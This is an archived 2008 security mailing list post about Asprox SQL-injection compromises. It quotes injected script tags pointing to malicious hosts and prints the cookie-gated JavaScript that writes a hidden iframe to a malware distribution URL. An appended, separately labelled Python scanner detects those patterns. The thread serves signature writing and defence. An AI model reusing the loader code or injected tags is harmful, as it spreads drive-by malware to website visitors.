[Emerging-Sigs] some asprox rules

David Glosser david.glosser at gmail.com
Thu Jul 10 12:40:55 EDT 2008


my bad. what about a sig which contains .mobi or .cn near a script tag?



> server:
>
> <script src=http://www.asp707.com/b.js></script>
> <script src=http://www.rid34.com/b.js></script>
> <script src=http://www.adbtch.com/ngg.js></script>
>
> And of the ones I found, none are on the main page or the home page.  They
> are always several layers deep, usually in a feedback form or in a
> "registered guest" sign up form.  If they were on the main page, it would
> get found by SK pen testers.  I don't think hackersafe or any of those types
> of products would find it, but even a junior pen tester *would* find it.  So
> it's buried down in the CMS somewhere.  Totally clever, because these web
> sites don't have any HTML on them.  They are brochure-ware that runs out of
> a stock CMS database that the owners know nothing about.
>
> If you go to one of those links, (which your ever-so-helpful browser does
> automatically) you get the iframe code:
>
> window.status="";
> n=navigator.userLanguage.toUpperCase();
> if((n!="ZH-CN")&&(n!="UR")&&(n!="RU")&&(n!="KO")&&(n!="ZH-TW")&&(n!="ZH")&&(n!="HI")&&(n!="TH")&&(n!="UR")&&(n!="VI")){
> var cookieString = document.cookie;
> var start = cookieString.indexOf("updngg=");
> if (start != -1){}else{
> var expires = new Date();
> expires.setTime(expires.getTime()+11*3600*1000);
> document.cookie = "updngg=update;expires="+expires.toGMTString();
> try{
> document.write("<iframe src=http://usabnr.com/cgi-bin/index.cgi?ad width=0 height=0 frameborder=0></iframe>");
> }
> catch(e)
> {
> };
> }}
>
> Which sends you to the actual malware distribution URL,
>      hxxp://usabnr.com/cgi-bin/index.cgi?ad
>
> Darn clever because it's not easy to find a single point where you can cut it
> off.  I did a dig on all the identified asprox URLs and found that 130 URLs
> all pointed to a pool of only 38 IP addresses.  So I have been advising
> people to drop these 38 addresses at the firewall:
>
>
> A quick scan of the addresses shows "the usual suspects" we see all the
> time, over and over.
>
> jp
>
> --
>
> Framework?  I don't need no stinking framework!
>
> ----------------------------------------------------------------
> @fferent Security Labs:  Isolate/Insulate/Innovate
> http://www.afferentsecurity.com
>
>

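As an added defender-side example (not code from the list post or from the Asprox samples quoted above): a small Python scanner that applies the two signature ideas discussed in the thread, flagging external script tags whose host ends in a watched TLD such as .cn or .mobi and clumps of consecutive external script tags, and checking second-stage JavaScript for the cookie-gated hidden-iframe loader pattern. The sample HTML and JavaScript are constructed, and the .cn/.mobi watch list is an assumption taken from the question above.

```python
import re
from urllib.parse import urlsplit

# Constructed sample of the injected HTML described in the thread: three
# back-to-back external script tags appended to CMS content. Hosts are
# placeholders, not real indicators.
SAMPLE_HTML = ('<p>Contact us</p><script src=http://www.example.cn/b.js></script>'
               '<script src=http://www.example.mobi/b.js></script>'
               '<script src=http://cdn.example.com/ngg.js></script>')

# Constructed sample of the second-stage loader: cookie gate plus 0x0 iframe.
SAMPLE_JS = ('var cookieString = document.cookie;\n'
             'var start = cookieString.indexOf("updngg=");\n'
             'document.write("<iframe src=http://loader.example.invalid/index.cgi?ad '
             'width=0 height=0 frameborder=0></iframe>");')

WATCH_TLDS = {"cn", "mobi"}   # assumption: TLDs singled out in the thread
SCRIPT_RE = re.compile(r'<script\s+src\s*=\s*["\']?(https?://[^\s"\'>]+)', re.I)


def find_external_scripts(html):
    """Return (url, host, tld_flagged) for each external <script src=...>;
    tld_flagged is True when the host's last label is in WATCH_TLDS."""
    hits = []
    for m in SCRIPT_RE.finditer(html):
        url = m.group(1)
        host = urlsplit(url).hostname or ""
        tld = host.rsplit(".", 1)[-1].lower()
        hits.append((url, host, tld in WATCH_TLDS))
    return hits


def count_adjacent_scripts(html):
    """Longest run of external script tags separated only by whitespace.
    Injected tags tend to arrive as one clump, unlike hand-written markup."""
    run_re = re.compile(r'(?:<script\s+src\s*=[^>]*>\s*</script>\s*){2,}', re.I)
    return max((len(SCRIPT_RE.findall(r.group(0)))
                for r in run_re.finditer(html)), default=0)


def iframe_loader_indicators(js):
    """Indicators of the loader: a document.cookie/indexOf gate and a
    document.write of an iframe with width=0 and height=0."""
    return {
        "cookie_gate": bool(re.search(r'document\.cookie.*?indexOf\(', js, re.S)),
        "hidden_iframe_write": bool(re.search(
            r'document\.write\(.*?<iframe.*?width=0\b.*?height=0\b', js, re.I | re.S)),
    }
```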

More information about the Emerging-sigs mailing list